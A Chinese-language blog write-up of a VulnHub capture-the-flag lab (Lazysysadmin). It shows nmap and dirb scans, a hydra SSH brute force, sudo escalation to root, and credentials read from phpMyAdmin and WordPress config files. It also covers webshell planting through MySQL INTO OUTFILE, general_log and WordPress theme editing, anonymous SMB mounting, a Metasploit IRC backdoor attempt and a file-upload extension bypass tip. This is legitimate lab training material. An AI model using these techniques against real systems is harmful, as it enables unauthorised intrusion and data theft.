[VulnHub靶机渗透]三:Lazysysadmin

  • Post author:
  • Post category:其他




一、实验环境

kali:192.168.56.104

扫描同一网段,探测主机:


nmap -sP 192.168.56.0/24

在这里插入图片描述

这就好办了,确定靶机ip为

192.168.56.103



二、信息收集

扫描端口:


nmap -sS -Pn -T4 -sV -O 192.168.56.103

在这里插入图片描述

所得到的信息:

OS: Linux 3.2 – 4.9(Ubuntu)

22端口: ssh——OpenSSH 6.6.1

80端口: http——Apache httpd 2.4.7

139端口: netbios——Samba smbd 3.x – 4.x

445端口: netbios——Samba smbd 4.3.11

3306端口: mysql——MySQL

6667端口: irc——InspIRCd

扫描目录:


dirb http://192.168.56.103


在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

扫描出了很多目录,后面的就不一一截图了,等下进行漏洞探测!



三、渗透测试



1. 22端口(ssh爆破)

尝试ssh爆破:

在这里插入图片描述

很遗憾没能直接爆破出来,但在我们扫描目录的时候不难发现这是一个

wordpress博客网站

进到主页里面寻找有用信息:

在这里插入图片描述

满屏的togie,啧啧,指定用户名,继续进行ssh爆破:

hydra -l togie -P password.txt -vV -t4 192.168.56.103 ssh  

在这里插入图片描述

用户名:	togie
 密码:	12345


也可以使用msf的auxiliary/scanner/ssh/ssh_login模块,爆破ssh

ssh连接:


ssh togie@192.168.56.103


在这里插入图片描述

从gid和uid可以看出我们并不是root权限

在这里插入图片描述

尝试提权:

sudo su 切换root身份,发现直接可以获得root权限:

在这里插入图片描述

在网站根目录下写马:

在这里插入图片描述

蚁剑连接失败,enmm22端口就到这儿吧!

在这里插入图片描述



2. 网站主页

主要从两个方面入手:

1、

wordpress登陆界面


2、

phpmyadmin登陆界面

另外网站存在

robots.txt

文件:

在这里插入图片描述

前三个都没什么用,第四个的图片名有点像base64:

在这里插入图片描述

解码后:

I$8b4f5a97-4757-4157-afe8-9a1a8

,还看不出来作用,先放着

在这里插入图片描述



phpmyadmin

默认的phpmyadmin配置文件位于phpmyadmin文件夹下,一般以下两个都是:


  • phpmyadmin/libraries/config.default.php

  • ./config.inc.php
root@LazySysAdmin:/usr/share/phpmyadmin/libraries# cat config.default.php 

查看config.default.php配置文件:只有用户名没有密码。。

在这里插入图片描述

但空密码登陆被禁止:

在这里插入图片描述



/etc/phpmyadmin/config-db.php

配置文件中找到了线索

用户名:phpmyadmin
密码:TogieMYSQL12345

在这里插入图片描述

但还是没办法登陆:

在这里插入图片描述

最终用

root


TogieMYSQL12345

成功登录!

在这里插入图片描述

phpmyadmin挂马的两种方式:

1、利用into outfile写文件挂马


show variables like "%secure%";


查看 MySQL 自定义的输出路径

在这里插入图片描述

已经指定了路径,那就先尝试一下向指定路径写马:


select "<?php phpinfo();?>" into outfile "/var/lib/mysql-files/test.php"


在这里插入图片描述

写入成功,浏览器查看并没有被解析

在这里插入图片描述

那就只能修改

secure_file_priv

的值,然后写入根路径了。

之前已经确定了网站根路径为:

/var/www/html


在这里插入图片描述


set global secure_file_priv = ''

在这里插入图片描述

失败。

2、利用日志文件挂马

查看全局日志情况:

show variables like "%general%"


不仅关闭,还限制了路径

在这里插入图片描述

开启日志记录:


set global general_log = on

在这里插入图片描述

设置日志路径为网站根目录:


set global general_log_file = "/var/www/html"

在这里插入图片描述

又失败了。



wordpress登陆

查看wordpress数据库,但报错了

在这里插入图片描述

看了看其他大佬的博客,好像是phpmyadmin配置文件本身的问题,去改一下试试。

找到phpmyadmin的配置文件:config.inc.php

将下面这一行:


$cfg['Servers'][$i]['table_uiprefs'] = 'pma_table_uiprefs';

改为:


$cfg['Servers'][$i]['pma__table_uiprefs'] = 'pma__table_uiprefs';


se,x_16)

在这里插入图片描述

使用service apache2 restart重启apache服务就可以了。(需要使用root权限操作)

就可以访问数据库内容了:


Admin

的密码被加密了

不是MD5加密,emm先搁置一下,至少我们知道存在用户

Admin

可以登录wordpress

$P$B.LCmtO3gkm0PdZNkBwgz2HQweq2Ur0

在这里插入图片描述

换一种方式获取密码:

查看wordpress的配置文件:


/var/www/html/wordpress/wp-config.php


在这里插入图片描述

在这里插入图片描述

密码为:

TogieMYSQL12345^^


成功登录:

在这里插入图片描述

上传一句话木马被拦截:

在这里插入图片描述

在主题编辑的地方找到一个php文件:


echo "11111111111";


在这里插入图片描述

网页访问可以正常输入

在这里插入图片描述

直接写入一句话,通过蚁剑连接:

在这里插入图片描述

在这里插入图片描述



3. 139 445端口(SMB)

SMB协议用于实现局域网的文件和打印机共享,Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。

常见的用于实现该共享功能的开放端口是139和445端口,一般连接会要求用户密码,但某些时候也会允许无密码连接。

本次就利用samba配置不当,导致无密码连接时泄漏重要文件,来进行渗透。

在这里插入图片描述

又发现允许无账号密码连接:

在这里插入图片描述

在连接目标主机的SMB文件共享服务时,有两种方式:

1、

资源管理器连接


2、

命令行连接


1、资源管理器连接:

1、Windows下,打开我的电脑,在地址栏输入 \192.168.56.103,提示输入账号密码,即可。

在这里插入图片描述

2、Linux下,在资源管理器下的网络服务中,输入smb://192.168.56.103 即可。

在这里插入图片描述


2、命令行连接:

1、远程网络挂载:


mount -t cifs //ip地址/path/to/share path/to/mount

mount:挂载命令

-t cifs: 用cifs文件系统挂载samba共享文件,如果提示错误的文件系统的话,可能是没有cifs,需要自己安装。【centos: yum install nfs-utils】

//ip地址/path/to/share:共享目录路径

path/to/mount:要挂载的路径,需要自己创建一个,这里我创建的文件夹是mount


mount -t cifs //192.168.56.103/share$ ./mount/


成功:

在这里插入图片描述

2、

smbclient连接

在这里插入图片描述

445端口的渗透测试就到此



4、6667端口(irc)

6667端口运行着irc服务软件InspIRCd,InspIRCd是一个可扩展的IRC软件包,可以在Linux、BSD或视窗系统下建立一个运行稳定界面时尚体积小巧的IRC聊天服务器。

搜索模块:

search unreal_ircd_3281_backdoor

利用模块

use exploit/unix/irc/unreal_ircd_3281_backdoor

查看参数,设置目标ip

show options
set rhosts 目标IP地址

执行:

exploit

但并不成功!



四、总结

总结一下渗透该靶机的大致的流程:

1、扫描主机,搜集端口服务及OS信息

2、利用信息泄漏(my name is togie)及弱口令爆出ssh密码

3、连接ssh,利用用户权限配置不当,得到root权限

4、利用root权限查看配置文件,得到phpmyadmin帐号密码

5、利用root权限,得到用户信息,登录Wordpress默认管理后台

6、在Wordpress中利用文件上传及插件进行种马,getshell

7、samba文件共享信息泄露,得到之前爆出的账号密码


知识点:

WordPress默认后台是 /wp-admin,其中插件功能存在众多漏洞,可以利用插件挂马。

phpmyadmin中挂马的两种方式:

1、into outfile直接写文件;

2、利用日志执行包含木马的sql语句。

做网站渗透时,一定不要忽略robots.txt文件,可能会有意外收获

Apache读文件名是从前到后,因此可以利用name.jpg.php来绕过检测



版权声明:本文为qq_45927819原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。